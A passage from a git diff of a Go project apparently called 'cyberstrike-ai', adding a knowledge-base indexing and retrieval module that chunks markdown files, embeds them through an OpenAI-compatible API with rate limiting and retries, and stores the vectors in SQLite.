continue + } + itemID, err := RequireMetaString(d.MetaData, metaKBItemID) + if err != nil { + return nil, fmt.Errorf("document %d: %w", i, err) + } + cat := MetaLookupString(d.MetaData, metaKBCategory) + title := MetaLookupString(d.MetaData, metaKBTitle) + chunkIdx, err := RequireMetaInt(d.MetaData, metaKBChunkIndex) + if err != nil { + return nil, fmt.Errorf("document %d: %w", i, err) + } + sim, _ := MetaFloat64OK(d.MetaData, metaSimilarity) + item := &KnowledgeItem{ID: itemID, Category: cat, Title: title} + chunk := &KnowledgeChunk{ + ID: d.ID, + ItemID: itemID, + ChunkIndex: chunkIdx, + ChunkText: d.Content, + } + out = append(out, &RetrievalResult{ + Chunk: chunk, + Item: item, + Similarity: sim, + Score: d.Score(), + }) + } + return out, nil +} + +var _ retriever.Retriever = (*VectorEinoRetriever)(nil) diff --git a/knowledge/eino_sqlite_indexer.go b/knowledge/eino_sqlite_indexer.go new file mode 100644 index 00000000..a0bbdcdc --- /dev/null +++ b/knowledge/eino_sqlite_indexer.go @@ -0,0 
+1,142 @@ +package knowledge + +import ( + "context" + "database/sql" + "encoding/json" + "fmt" + "strings" + + "github.com/cloudwego/eino/callbacks" + "github.com/cloudwego/eino/components" + "github.com/cloudwego/eino/components/indexer" + "github.com/cloudwego/eino/schema" + "github.com/google/uuid" +) + +// SQLiteIndexer implements [indexer.Indexer] against knowledge_embeddings + existing schema. +type SQLiteIndexer struct { + db *sql.DB + batchSize int + embeddingModel string +} + +// NewSQLiteIndexer returns an indexer that writes chunk rows for one knowledge item per Store call. +// batchSize is the embedding batch size; if <= 0, default 64 is used. +// embeddingModel is persisted per row for retrieval-time consistency checks (may be empty). +func NewSQLiteIndexer(db *sql.DB, batchSize int, embeddingModel string) *SQLiteIndexer { + return &SQLiteIndexer{db: db, batchSize: batchSize, embeddingModel: strings.TrimSpace(embeddingModel)} +} + +// GetType implements eino callback run info. +func (s *SQLiteIndexer) GetType() string { + return "SQLiteKnowledgeIndexer" +} + +// Store embeds documents and inserts rows. Each doc must carry MetaData: +// kb_item_id, kb_category, kb_title, kb_chunk_index (int). Content is chunk text only. +func (s *SQLiteIndexer) Store(ctx context.Context, docs []*schema.Document, opts ...indexer.Option) (ids []string, err error) { + options := indexer.GetCommonOptions(nil, opts...) 
+ if options.Embedding == nil { + return nil, fmt.Errorf("sqlite indexer: embedding is required") + } + if len(docs) == 0 { + return nil, nil + } + + ctx = callbacks.EnsureRunInfo(ctx, s.GetType(), components.ComponentOfIndexer) + ctx = callbacks.OnStart(ctx, &indexer.CallbackInput{Docs: docs}) + defer func() { + if err != nil { + _ = callbacks.OnError(ctx, err) + return + } + _ = callbacks.OnEnd(ctx, &indexer.CallbackOutput{IDs: ids}) + }() + + subIdxStr := strings.Join(options.SubIndexes, ",") + + texts := make([]string, len(docs)) + for i, d := range docs { + if d == nil { + return nil, fmt.Errorf("sqlite indexer: nil document at %d", i) + } + cat := MetaLookupString(d.MetaData, metaKBCategory) + title := MetaLookupString(d.MetaData, metaKBTitle) + texts[i] = FormatEmbeddingInput(cat, title, d.Content) + } + + bs := s.batchSize + if bs <= 0 { + bs = 64 + } + + var allVecs [][]float64 + for start := 0; start < len(texts); start += bs { + end := start + bs + if end > len(texts) { + end = len(texts) + } + batch := texts[start:end] + vecs, embedErr := options.Embedding.EmbedStrings(ctx, batch) + if embedErr != nil { + return nil, fmt.Errorf("sqlite indexer: embed batch %d-%d: %w", start, end, embedErr) + } + if len(vecs) != len(batch) { + return nil, fmt.Errorf("sqlite indexer: embed count mismatch: got %d want %d", len(vecs), len(batch)) + } + allVecs = append(allVecs, vecs...) 
+ } + + embedDim := 0 + if len(allVecs) > 0 { + embedDim = len(allVecs[0]) + } + + tx, err := s.db.BeginTx(ctx, nil) + if err != nil { + return nil, fmt.Errorf("sqlite indexer: begin tx: %w", err) + } + defer tx.Rollback() + + ids = make([]string, 0, len(docs)) + for i, d := range docs { + chunkID := uuid.New().String() + itemID, metaErr := RequireMetaString(d.MetaData, metaKBItemID) + if metaErr != nil { + return nil, fmt.Errorf("sqlite indexer: doc %d: %w", i, metaErr) + } + chunkIdx, metaErr := RequireMetaInt(d.MetaData, metaKBChunkIndex) + if metaErr != nil { + return nil, fmt.Errorf("sqlite indexer: doc %d: %w", i, metaErr) + } + vec := allVecs[i] + if embedDim > 0 && len(vec) != embedDim { + return nil, fmt.Errorf("sqlite indexer: inconsistent embedding dim at doc %d: got %d want %d", i, len(vec), embedDim) + } + vec32 := make([]float32, len(vec)) + for j, v := range vec { + vec32[j] = float32(v) + } + embeddingJSON, jsonErr := json.Marshal(vec32) + if jsonErr != nil { + return nil, fmt.Errorf("sqlite indexer: marshal embedding: %w", jsonErr) + } + _, err = tx.ExecContext(ctx, + `INSERT INTO knowledge_embeddings (id, item_id, chunk_index, chunk_text, embedding, sub_indexes, embedding_model, embedding_dim, created_at) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, datetime('now'))`, + chunkID, itemID, chunkIdx, d.Content, string(embeddingJSON), subIdxStr, s.embeddingModel, embedDim, + ) + if err != nil { + return nil, fmt.Errorf("sqlite indexer: insert chunk %d: %w", i, err) + } + ids = append(ids, chunkID) + } + + if err := tx.Commit(); err != nil { + return nil, fmt.Errorf("sqlite indexer: commit: %w", err) + } + return ids, nil +} + +var _ indexer.Indexer = (*SQLiteIndexer)(nil) diff --git a/knowledge/embedder.go b/knowledge/embedder.go new file mode 100644 index 00000000..d9ce8afa --- /dev/null +++ b/knowledge/embedder.go @@ -0,0 +1,251 @@ +package knowledge + +import ( + "context" + "fmt" + "net/http" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/config" 
+ + einoembedopenai "github.com/cloudwego/eino-ext/components/embedding/openai" + "github.com/cloudwego/eino/components/embedding" + "go.uber.org/zap" + "golang.org/x/time/rate" +) + +// Embedder 使用 CloudWeGo Eino 的 OpenAI Embedding 组件,并保留速率限制与重试。 +type Embedder struct { + eino embedding.Embedder + config *config.KnowledgeConfig + logger *zap.Logger + + rateLimiter *rate.Limiter + rateLimitDelay time.Duration + maxRetries int + retryDelay time.Duration + mu sync.Mutex +} + +// NewEmbedder 基于 Eino eino-ext OpenAI Embedder;openAIConfig 用于在知识库未单独配置 key 时回退 API Key。 +func NewEmbedder(ctx context.Context, cfg *config.KnowledgeConfig, openAIConfig *config.OpenAIConfig, logger *zap.Logger) (*Embedder, error) { + if cfg == nil { + return nil, fmt.Errorf("knowledge config is nil") + } + + var rateLimiter *rate.Limiter + var rateLimitDelay time.Duration + if cfg.Indexing.MaxRPM > 0 { + rpm := cfg.Indexing.MaxRPM + rateLimiter = rate.NewLimiter(rate.Every(time.Minute/time.Duration(rpm)), rpm) + if logger != nil { + logger.Info("知识库索引速率限制已启用", zap.Int("maxRPM", rpm)) + } + } else if cfg.Indexing.RateLimitDelayMs > 0 { + rateLimitDelay = time.Duration(cfg.Indexing.RateLimitDelayMs) * time.Millisecond + if logger != nil { + logger.Info("知识库索引固定延迟已启用", zap.Duration("delay", rateLimitDelay)) + } + } + + maxRetries := 3 + retryDelay := 1000 * time.Millisecond + if cfg.Indexing.MaxRetries > 0 { + maxRetries = cfg.Indexing.MaxRetries + } + if cfg.Indexing.RetryDelayMs > 0 { + retryDelay = time.Duration(cfg.Indexing.RetryDelayMs) * time.Millisecond + } + + model := strings.TrimSpace(cfg.Embedding.Model) + if model == "" { + model = "text-embedding-3-small" + } + + baseURL := strings.TrimSpace(cfg.Embedding.BaseURL) + baseURL = strings.TrimSuffix(baseURL, "/") + if baseURL == "" { + baseURL = "https://api.openai.com/v1" + } + + apiKey := strings.TrimSpace(cfg.Embedding.APIKey) + if apiKey == "" && openAIConfig != nil { + apiKey = strings.TrimSpace(openAIConfig.APIKey) + } + if apiKey 
== "" { + return nil, fmt.Errorf("embedding API key 未配置") + } + + timeout := 120 * time.Second + if cfg.Indexing.RequestTimeoutSeconds > 0 { + timeout = time.Duration(cfg.Indexing.RequestTimeoutSeconds) * time.Second + } + httpClient := &http.Client{Timeout: timeout} + + inner, err := einoembedopenai.NewEmbedder(ctx, &einoembedopenai.EmbeddingConfig{ + APIKey: apiKey, + BaseURL: baseURL, + ByAzure: false, + Model: model, + HTTPClient: httpClient, + }) + if err != nil { + return nil, fmt.Errorf("eino OpenAI embedder: %w", err) + } + + return &Embedder{ + eino: inner, + config: cfg, + logger: logger, + rateLimiter: rateLimiter, + rateLimitDelay: rateLimitDelay, + maxRetries: maxRetries, + retryDelay: retryDelay, + }, nil +} + +// EmbeddingModelName 返回配置的嵌入模型名(用于 tiktoken 分块与向量行元数据)。 +func (e *Embedder) EmbeddingModelName() string { + if e == nil || e.config == nil { + return "" + } + s := strings.TrimSpace(e.config.Embedding.Model) + if s != "" { + return s + } + return "text-embedding-3-small" +} + +func (e *Embedder) waitRateLimiter() { + e.mu.Lock() + defer e.mu.Unlock() + + if e.rateLimiter != nil { + ctx := context.Background() + if err := e.rateLimiter.Wait(ctx); err != nil && e.logger != nil { + e.logger.Warn("速率限制器等待失败", zap.Error(err)) + } + } + if e.rateLimitDelay > 0 { + time.Sleep(e.rateLimitDelay) + } +} + +// EmbedText 单条嵌入(float32,与历史存储格式一致)。 +func (e *Embedder) EmbedText(ctx context.Context, text string) ([]float32, error) { + vecs, err := e.EmbedStrings(ctx, []string{text}) + if err != nil { + return nil, err + } + if len(vecs) != 1 { + return nil, fmt.Errorf("unexpected embedding count: %d", len(vecs)) + } + return vecs[0], nil +} + +// EmbedStrings 批量嵌入,带重试;实现 [embedding.Embedder],可供 Eino Indexer 使用。 +func (e *Embedder) EmbedStrings(ctx context.Context, texts []string, opts ...embedding.Option) ([][]float32, error) { + if e == nil || e.eino == nil { + return nil, fmt.Errorf("embedder not initialized") + } + if len(texts) == 0 { + return nil, nil + 
} + + var lastErr error + for attempt := 0; attempt < e.maxRetries; attempt++ { + if attempt > 0 { + wait := e.retryDelay * time.Duration(attempt) + if e.logger != nil { + e.logger.Debug("嵌入重试前等待", zap.Int("attempt", attempt+1), zap.Duration("wait", wait)) + } + select { + case <-ctx.Done(): + return nil, ctx.Err() + case <-time.After(wait): + } + } else { + e.waitRateLimiter() + } + + raw, err := e.eino.EmbedStrings(ctx, texts, opts...) + if err == nil { + out := make([][]float32, len(raw)) + for i, row := range raw { + out[i] = make([]float32, len(row)) + for j, v := range row { + out[i][j] = float32(v) + } + } + return out, nil + } + lastErr = err + if !e.isRetryableError(err) { + return nil, err + } + if e.logger != nil { + e.logger.Debug("嵌入失败,将重试", zap.Int("attempt", attempt+1), zap.Error(err)) + } + } + return nil, fmt.Errorf("达到最大重试次数 (%d): %v", e.maxRetries, lastErr) +} + +// EmbedTexts 批量 float32 嵌入(兼容旧调用;单次请求批量以减小延迟)。 +func (e *Embedder) EmbedTexts(ctx context.Context, texts []string) ([][]float32, error) { + return e.EmbedStrings(ctx, texts) +} + +func (e *Embedder) isRetryableError(err error) bool { + if err == nil { + return false + } + errStr := err.Error() + if strings.Contains(errStr, "429") || strings.Contains(errStr, "rate limit") { + return true + } + if strings.Contains(errStr, "500") || strings.Contains(errStr, "502") || + strings.Contains(errStr, "503") || strings.Contains(errStr, "504") { + return true + } + if strings.Contains(errStr, "timeout") || strings.Contains(errStr, "connection") || + strings.Contains(errStr, "network") || strings.Contains(errStr, "EOF") { + return true + } + return false +} + +// einoFloatEmbedder adapts [][]float32 embedder to Eino's [][]float64 [embedding.Embedder] for Indexer.Store. 
+type einoFloatEmbedder struct { + inner *Embedder +} + +func (w *einoFloatEmbedder) EmbedStrings(ctx context.Context, texts []string, opts ...embedding.Option) ([][]float64, error) { + vec32, err := w.inner.EmbedStrings(ctx, texts, opts...) + if err != nil { + return nil, err + } + out := make([][]float64, len(vec32)) + for i, row := range vec32 { + out[i] = make([]float64, len(row)) + for j, v := range row { + out[i][j] = float64(v) + } + } + return out, nil +} + +func (w *einoFloatEmbedder) GetType() string { + return "CyberStrikeKnowledgeEmbedder" +} + +func (w *einoFloatEmbedder) IsCallbacksEnabled() bool { + return false +} + +// EinoEmbeddingComponent returns an [embedding.Embedder] that uses the same retry/rate-limit path +// and produces float64 vectors expected by generic Eino indexer helpers. +func (e *Embedder) EinoEmbeddingComponent() embedding.Embedder { + return &einoFloatEmbedder{inner: e} +} diff --git a/knowledge/index_pipeline.go b/knowledge/index_pipeline.go new file mode 100644 index 00000000..a9b9a4c4 --- /dev/null +++ b/knowledge/index_pipeline.go @@ -0,0 +1,91 @@ +package knowledge + +import ( + "context" + "database/sql" + "fmt" + "strings" + + "cyberstrike-ai/internal/config" + + "github.com/cloudwego/eino/components/document" + "github.com/cloudwego/eino/compose" + "github.com/cloudwego/eino/schema" +) + +// normalizeChunkStrategy returns "recursive" or "markdown_then_recursive". 
+func normalizeChunkStrategy(s string) string { + v := strings.TrimSpace(strings.ToLower(s)) + switch v { + case "recursive": + return "recursive" + case "markdown_then_recursive", "markdown_recursive", "markdown": + return "markdown_then_recursive" + case "": + return "markdown_then_recursive" + default: + return "markdown_then_recursive" + } +} + +func buildKnowledgeIndexChain( + ctx context.Context, + indexingCfg *config.IndexingConfig, + db *sql.DB, + recursive document.Transformer, + embeddingModel string, +) (compose.Runnable[[]*schema.Document, []string], error) { + if recursive == nil { + return nil, fmt.Errorf("recursive transformer is nil") + } + if db == nil { + return nil, fmt.Errorf("db is nil") + } + strategy := normalizeChunkStrategy("markdown_then_recursive") + batch := 64 + maxChunks := 0 + if indexingCfg != nil { + strategy = normalizeChunkStrategy(indexingCfg.ChunkStrategy) + if indexingCfg.BatchSize > 0 { + batch = indexingCfg.BatchSize + } + maxChunks = indexingCfg.MaxChunksPerItem + } + + si := NewSQLiteIndexer(db, batch, embeddingModel) + ch := compose.NewChain[[]*schema.Document, []string]() + if strategy != "recursive" { + md, err := newMarkdownHeaderSplitter(ctx) + if err != nil { + return nil, fmt.Errorf("markdown splitter: %w", err) + } + ch.AppendDocumentTransformer(md) + } + ch.AppendDocumentTransformer(recursive) + ch.AppendLambda(newChunkEnrichLambda(maxChunks)) + ch.AppendIndexer(si) + return ch.Compile(ctx) +} + +func newChunkEnrichLambda(maxChunks int) *compose.Lambda { + return compose.InvokableLambda(func(ctx context.Context, docs []*schema.Document) ([]*schema.Document, error) { + _ = ctx + out := make([]*schema.Document, 0, len(docs)) + for _, d := range docs { + if d == nil || strings.TrimSpace(d.Content) == "" { + continue + } + out = append(out, d) + } + if maxChunks > 0 && len(out) > maxChunks { + out = out[:maxChunks] + } + for i, d := range out { + if d.MetaData == nil { + d.MetaData = make(map[string]any) + } + 
d.MetaData[metaKBChunkIndex] = i + } + return out, nil + }) +} diff --git a/knowledge/index_pipeline_test.go b/knowledge/index_pipeline_test.go new file mode 100644 index 00000000..9e4b03fa --- /dev/null +++ b/knowledge/index_pipeline_test.go @@ -0,0 +1,21 @@ +package knowledge + +import "testing" + +func TestNormalizeChunkStrategy(t *testing.T) { + cases := []struct { + in, want string + }{ + {"", "markdown_then_recursive"}, + {"recursive", "recursive"}, + {"RECURSIVE", "recursive"}, + {"markdown_then_recursive", "markdown_then_recursive"}, + {"markdown", "markdown_then_recursive"}, + {"unknown", "markdown_then_recursive"}, + } + for _, tc := range cases { + if got := normalizeChunkStrategy(tc.in); got != tc.want { + t.Errorf("normalizeChunkStrategy(%q) = %q, want %q", tc.in, got, tc.want) + } + } +} diff --git a/knowledge/indexer.go b/knowledge/indexer.go new file mode 100644 index 00000000..aeb6b9ff --- /dev/null +++ b/knowledge/indexer.go @@ -0,0 +1,352 @@ +package knowledge + +import ( + "context" + "database/sql" + "fmt" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/config" + + fileloader "github.com/cloudwego/eino-ext/components/document/loader/file" + "github.com/cloudwego/eino/components/document" + "github.com/cloudwego/eino/components/indexer" + "github.com/cloudwego/eino/compose" + "github.com/cloudwego/eino/schema" + "go.uber.org/zap" +) + +// Indexer 使用 Eino Compose 索引链(Markdown/递归分块、Lambda enrich、SQLite 索引)与嵌入写入。 +type Indexer struct { + db *sql.DB + embedder *Embedder + logger *zap.Logger + chunkSize int + overlap int + indexingCfg *config.IndexingConfig + + indexChain compose.Runnable[[]*schema.Document, []string] + fileLoader *fileloader.FileLoader + + mu sync.RWMutex + lastError string + lastErrorTime time.Time + errorCount int + + rebuildMu sync.RWMutex + isRebuilding bool + rebuildTotalItems int + rebuildCurrent int + rebuildFailed int + rebuildStartTime time.Time + rebuildLastItemID string + rebuildLastChunks int +} + +// 
NewIndexer 创建索引器并编译 Eino 索引链;kcfg 为完整知识库配置(含 indexing 与路径相关行为)。 +func NewIndexer(ctx context.Context, db *sql.DB, embedder *Embedder, logger *zap.Logger, kcfg *config.KnowledgeConfig) (*Indexer, error) { + if db == nil { + return nil, fmt.Errorf("db is nil") + } + if embedder == nil { + return nil, fmt.Errorf("embedder is nil") + } + if err := EnsureKnowledgeEmbeddingsSchema(db); err != nil { + return nil, fmt.Errorf("knowledge_embeddings 结构迁移: %w", err) + } + if kcfg == nil { + kcfg = &config.KnowledgeConfig{} + } + indexingCfg := &kcfg.Indexing + + chunkSize := 512 + overlap := 50 + if indexingCfg.ChunkSize > 0 { + chunkSize = indexingCfg.ChunkSize + } + if indexingCfg.ChunkOverlap >= 0 { + overlap = indexingCfg.ChunkOverlap + } + + embedModel := embedder.EmbeddingModelName() + splitter, err := newKnowledgeSplitter(chunkSize, overlap, embedModel) + if err != nil { + return nil, fmt.Errorf("eino recursive splitter: %w", err) + } + + chain, err := buildKnowledgeIndexChain(ctx, indexingCfg, db, splitter, embedModel) + if err != nil { + return nil, fmt.Errorf("knowledge index chain: %w", err) + } + + var fl *fileloader.FileLoader + fl, err = fileloader.NewFileLoader(ctx, nil) + if err != nil { + if logger != nil { + logger.Warn("Eino FileLoader 初始化失败,prefer_source_file 将回退数据库正文", zap.Error(err)) + } + fl = nil + err = nil + } + + return &Indexer{ + db: db, + embedder: embedder, + logger: logger, + chunkSize: chunkSize, + overlap: overlap, + indexingCfg: indexingCfg, + indexChain: chain, + fileLoader: fl, + }, nil +} + +// RecompileIndexChain 在配置或嵌入模型变更后重建 Eino 索引链(无需重启进程)。 +func (idx *Indexer) RecompileIndexChain(ctx context.Context) error { + if idx == nil || idx.db == nil || idx.embedder == nil { + return fmt.Errorf("indexer 未初始化") + } + if err := EnsureKnowledgeEmbeddingsSchema(idx.db); err != nil { + return err + } + embedModel := idx.embedder.EmbeddingModelName() + splitter, err := newKnowledgeSplitter(idx.chunkSize, idx.overlap, embedModel) + if err != nil { + 
return fmt.Errorf("eino recursive splitter: %w", err) + } + chain, err := buildKnowledgeIndexChain(ctx, idx.indexingCfg, idx.db, splitter, embedModel) + if err != nil { + return fmt.Errorf("knowledge index chain: %w", err) + } + idx.indexChain = chain + return nil +} + +// IndexItem 索引单个知识项:先清空旧向量,再走 Compose 链(分块、嵌入、写入)。 +func (idx *Indexer) IndexItem(ctx context.Context, itemID string) error { + if idx.indexChain == nil { + return fmt.Errorf("索引链未初始化") + } + if idx.embedder == nil { + return fmt.Errorf("嵌入器未初始化") + } + + var content, category, title, filePath string + err := idx.db.QueryRow("SELECT content, category, title, file_path FROM knowledge_base_items WHERE id = ?", itemID).Scan(&content, &category, &title, &filePath) + if err != nil { + return fmt.Errorf("获取知识项失败:%w", err) + } + + if _, err := idx.db.Exec("DELETE FROM knowledge_embeddings WHERE item_id = ?", itemID); err != nil { + return fmt.Errorf("删除旧向量失败:%w", err) + } + + body := strings.TrimSpace(content) + if idx.indexingCfg != nil && idx.indexingCfg.PreferSourceFile && strings.TrimSpace(filePath) != "" && idx.fileLoader != nil { + docs, lerr := idx.fileLoader.Load(ctx, document.Source{URI: strings.TrimSpace(filePath)}) + if lerr == nil && len(docs) > 0 { + var b strings.Builder + for i, d := range docs { + if d == nil { + continue + } + if i > 0 { + b.WriteString("\n\n") + } + b.WriteString(d.Content) + } + if s := strings.TrimSpace(b.String()); s != "" { + body = s + } + } else if idx.logger != nil { + idx.logger.Warn("优先源文件读取失败,使用数据库正文", + zap.String("itemId", itemID), + zap.String("path", filePath), + zap.Error(lerr)) + } + } + + root := &schema.Document{ + ID: itemID, + Content: body, + MetaData: map[string]any{ + metaKBCategory: category, + metaKBTitle: title, + metaKBItemID: itemID, + }, + } + + idxOpts := []indexer.Option{indexer.WithEmbedding(idx.embedder.EinoEmbeddingComponent())} + if idx.indexingCfg != nil && len(idx.indexingCfg.SubIndexes) > 0 { + idxOpts = append(idxOpts, 
indexer.WithSubIndexes(idx.indexingCfg.SubIndexes)) + } + + ids, err := idx.indexChain.Invoke(ctx, []*schema.Document{root}, compose.WithIndexerOption(idxOpts...)) + if err != nil { + msg := fmt.Sprintf("索引写入失败 (知识项:%s): %v", itemID, err) + idx.mu.Lock() + idx.lastError = msg + idx.lastErrorTime = time.Now() + idx.mu.Unlock() + return err + } + + if idx.logger != nil { + idx.logger.Info("知识项索引完成", zap.String("itemId", itemID), zap.Int("chunks", len(ids))) + } + idx.rebuildMu.Lock() + idx.rebuildLastItemID = itemID + idx.rebuildLastChunks = len(ids) + idx.rebuildMu.Unlock() + return nil +} + +// HasIndex 检查是否存在索引 +func (idx *Indexer) HasIndex() (bool, error) { + var count int + err := idx.db.QueryRow("SELECT COUNT(*) FROM knowledge_embeddings").Scan(&count) + if err != nil { + return false, fmt.Errorf("检查索引失败:%w", err) + } + return count > 0, nil +} + +// RebuildIndex 重建所有索引 +func (idx *Indexer) RebuildIndex(ctx context.Context) error { + idx.rebuildMu.Lock() + idx.isRebuilding = true + idx.rebuildTotalItems = 0 + idx.rebuildCurrent = 0 + idx.rebuildFailed = 0 + idx.rebuildStartTime = time.Now() + idx.rebuildLastItemID = "" + idx.rebuildLastChunks = 0 + idx.rebuildMu.Unlock() + + idx.mu.Lock() + idx.lastError = "" + idx.lastErrorTime = time.Time{} + idx.errorCount = 0 + idx.mu.Unlock() + + rows, err := idx.db.Query("SELECT id FROM knowledge_base_items") + if err != nil { + idx.rebuildMu.Lock() + idx.isRebuilding = false + idx.rebuildMu.Unlock() + return fmt.Errorf("查询知识项失败:%w", err) + } + defer rows.Close() + + var itemIDs []string + for rows.Next() { + var id string + if err := rows.Scan(&id); err != nil { + idx.rebuildMu.Lock() + idx.isRebuilding = false + idx.rebuildMu.Unlock() + return fmt.Errorf("扫描知识项 ID 失败:%w", err) + } + itemIDs = append(itemIDs, id) + } + + idx.rebuildMu.Lock() + idx.rebuildTotalItems = len(itemIDs) + idx.rebuildMu.Unlock() + + idx.logger.Info("开始重建索引", zap.Int("totalItems", len(itemIDs))) + + failedCount := 0 + consecutiveFailures := 0 + 
maxConsecutiveFailures := 5 + firstFailureItemID := "" + var firstFailureError error + + for i, itemID := range itemIDs { + if err := idx.IndexItem(ctx, itemID); err != nil { + failedCount++ + consecutiveFailures++ + + if consecutiveFailures == 1 { + firstFailureItemID = itemID + firstFailureError = err + idx.logger.Warn("索引知识项失败", + zap.String("itemId", itemID), + zap.Int("totalItems", len(itemIDs)), + zap.Error(err), + ) + } + + if consecutiveFailures >= maxConsecutiveFailures { + errorMsg := fmt.Sprintf("连续 %d 个知识项索引失败,可能存在配置问题(如嵌入模型配置错误、API 密钥无效、余额不足等)。第一个失败项:%s, 错误:%v", consecutiveFailures, firstFailureItemID, firstFailureError) + idx.mu.Lock() + idx.lastError = errorMsg + idx.lastErrorTime = time.Now() + idx.mu.Unlock() + + idx.logger.Error("连续索引失败次数过多,立即停止索引", + zap.Int("consecutiveFailures", consecutiveFailures), + zap.Int("totalItems", len(itemIDs)), + zap.Int("processedItems", i+1), + zap.String("firstFailureItemId", firstFailureItemID), + zap.Error(firstFailureError), + ) + return fmt.Errorf("连续索引失败次数过多:%v", firstFailureError) + } + + if failedCount > len(itemIDs)*3/10 && failedCount == len(itemIDs)*3/10+1 { + errorMsg := fmt.Sprintf("索引失败的知识项过多 (%d/%d),可能存在配置问题。第一个失败项:%s, 错误:%v", failedCount, len(itemIDs), firstFailureItemID, firstFailureError) + idx.mu.Lock() + idx.lastError = errorMsg + idx.lastErrorTime = time.Now() + idx.mu.Unlock() + + idx.logger.Error("索引失败的知识项过多,可能存在配置问题", + zap.Int("failedCount", failedCount), + zap.Int("totalItems", len(itemIDs)), + zap.String("firstFailureItemId", firstFailureItemID), + zap.Error(firstFailureError), + ) + } + continue + } + + if consecutiveFailures > 0 { + consecutiveFailures = 0 + firstFailureItemID = "" + firstFailureError = nil + } + + idx.rebuildMu.Lock() + idx.rebuildCurrent = i + 1 + idx.rebuildFailed = failedCount + idx.rebuildMu.Unlock() + + if (i+1)%10 == 0 || (len(itemIDs) > 0 && (i+1)*100/len(itemIDs)%10 == 0 && (i+1)*100/len(itemIDs) > 0) { + idx.logger.Info("索引进度", zap.Int("current", i+1), 
zap.Int("total", len(itemIDs)), zap.Int("failed", failedCount)) + } + } + + idx.rebuildMu.Lock() + idx.isRebuilding = false + idx.rebuildMu.Unlock() + + idx.logger.Info("索引重建完成", zap.Int("totalItems", len(itemIDs)), zap.Int("failedCount", failedCount)) + return nil +} + +// GetLastError 获取最近一次错误信息 +func (idx *Indexer) GetLastError() (string, time.Time) { + idx.mu.RLock() + defer idx.mu.RUnlock() + return idx.lastError, idx.lastErrorTime +} + +// GetRebuildStatus 获取重建索引状态 +func (idx *Indexer) GetRebuildStatus() (isRebuilding bool, totalItems int, current int, failed int, lastItemID string, lastChunks int, startTime time.Time) { + idx.rebuildMu.RLock() + defer idx.rebuildMu.RUnlock() + return idx.isRebuilding, idx.rebuildTotalItems, idx.rebuildCurrent, idx.rebuildFailed, idx.rebuildLastItemID, idx.rebuildLastChunks, idx.rebuildStartTime +} diff --git a/knowledge/manager.go b/knowledge/manager.go new file mode 100644 index 00000000..7309cc2a --- /dev/null +++ b/knowledge/manager.go @@ -0,0 +1,885 @@ +package knowledge + +import ( + "database/sql" + "encoding/json" + "fmt" + "io/fs" + "os" + "path/filepath" + "strings" + "time" + + "github.com/google/uuid" + "go.uber.org/zap" +) + +// Manager 知识库管理器 +type Manager struct { + db *sql.DB + basePath string + logger *zap.Logger +} + +// NewManager 创建新的知识库管理器 +func NewManager(db *sql.DB, basePath string, logger *zap.Logger) *Manager { + return &Manager{ + db: db, + basePath: basePath, + logger: logger, + } +} + +// ScanKnowledgeBase 扫描知识库目录,更新数据库 +// 返回需要索引的知识项ID列表(新添加的或更新的) +func (m *Manager) ScanKnowledgeBase() ([]string, error) { + if m.basePath == "" { + return nil, fmt.Errorf("知识库路径未配置") + } + + // 确保目录存在 + if err := os.MkdirAll(m.basePath, 0755); err != nil { + return nil, fmt.Errorf("创建知识库目录失败: %w", err) + } + + var itemsToIndex []string + + // 遍历知识库目录 + err := filepath.WalkDir(m.basePath, func(path string, d fs.DirEntry, err error) error { + if err != nil { + return err + } + + // 跳过目录和非markdown文件 + if d.IsDir() || 
!strings.HasSuffix(strings.ToLower(path), ".md") { + return nil + } + + // 计算相对路径和分类 + relPath, err := filepath.Rel(m.basePath, path) + if err != nil { + return err + } + + // 第一个目录名作为分类(风险类型) + parts := strings.Split(relPath, string(filepath.Separator)) + category := "未分类" + if len(parts) > 1 { + category = parts[0] + } + + // 文件名为标题 + title := strings.TrimSuffix(filepath.Base(path), ".md") + + // 读取文件内容 + content, err := os.ReadFile(path) + if err != nil { + m.logger.Warn("读取知识库文件失败", zap.String("path", path), zap.Error(err)) + return nil // 继续处理其他文件 + } + + // 检查是否已存在 + var existingID string + var existingContent string + var existingUpdatedAt time.Time + err = m.db.QueryRow( + "SELECT id, content, updated_at FROM knowledge_base_items WHERE file_path = ?", + path, + ).Scan(&existingID, &existingContent, &existingUpdatedAt) + + if err == sql.ErrNoRows { + // 创建新项 + id := uuid.New().String() + now := time.Now() + _, err = m.db.Exec( + "INSERT INTO knowledge_base_items (id, category, title, file_path, content, created_at, updated_at) VALUES (?, ?, ?, ?, ?, ?, ?)", + id, category, title, path, string(content), now, now, + ) + if err != nil { + return fmt.Errorf("插入知识项失败: %w", err) + } + m.logger.Info("添加知识项", zap.String("id", id), zap.String("title", title), zap.String("category", category)) + // 新添加的项需要索引 + itemsToIndex = append(itemsToIndex, id) + } else if err == nil { + // 检查内容是否有变化 + contentChanged := existingContent != string(content) + if contentChanged { + // 更新现有项 + _, err = m.db.Exec( + "UPDATE knowledge_base_items SET category = ?, title = ?, content = ?, updated_at = ? 
WHERE id = ?", + category, title, string(content), time.Now(), existingID, + ) + if err != nil { + return fmt.Errorf("更新知识项失败: %w", err) + } + m.logger.Info("更新知识项", zap.String("id", existingID), zap.String("title", title)) + // 内容已更新的项需要重新索引 + itemsToIndex = append(itemsToIndex, existingID) + } else { + m.logger.Debug("知识项未变化,跳过", zap.String("id", existingID), zap.String("title", title)) + } + } else { + return fmt.Errorf("查询知识项失败: %w", err) + } + + return nil + }) + + if err != nil { + return nil, err + } + + return itemsToIndex, nil +} + +// GetCategories 获取所有分类(风险类型) +func (m *Manager) GetCategories() ([]string, error) { + rows, err := m.db.Query("SELECT DISTINCT category FROM knowledge_base_items ORDER BY category") + if err != nil { + return nil, fmt.Errorf("查询分类失败: %w", err) + } + defer rows.Close() + + var categories []string + for rows.Next() { + var category string + if err := rows.Scan(&category); err != nil { + return nil, fmt.Errorf("扫描分类失败: %w", err) + } + categories = append(categories, category) + } + + return categories, nil +} + +// GetStats 获取知识库统计信息 +func (m *Manager) GetStats() (int, int, error) { + // 获取分类总数 + categories, err := m.GetCategories() + if err != nil { + return 0, 0, fmt.Errorf("获取分类失败: %w", err) + } + totalCategories := len(categories) + + // 获取知识项总数 + var totalItems int + err = m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items").Scan(&totalItems) + if err != nil { + return totalCategories, 0, fmt.Errorf("获取知识项总数失败: %w", err) + } + + return totalCategories, 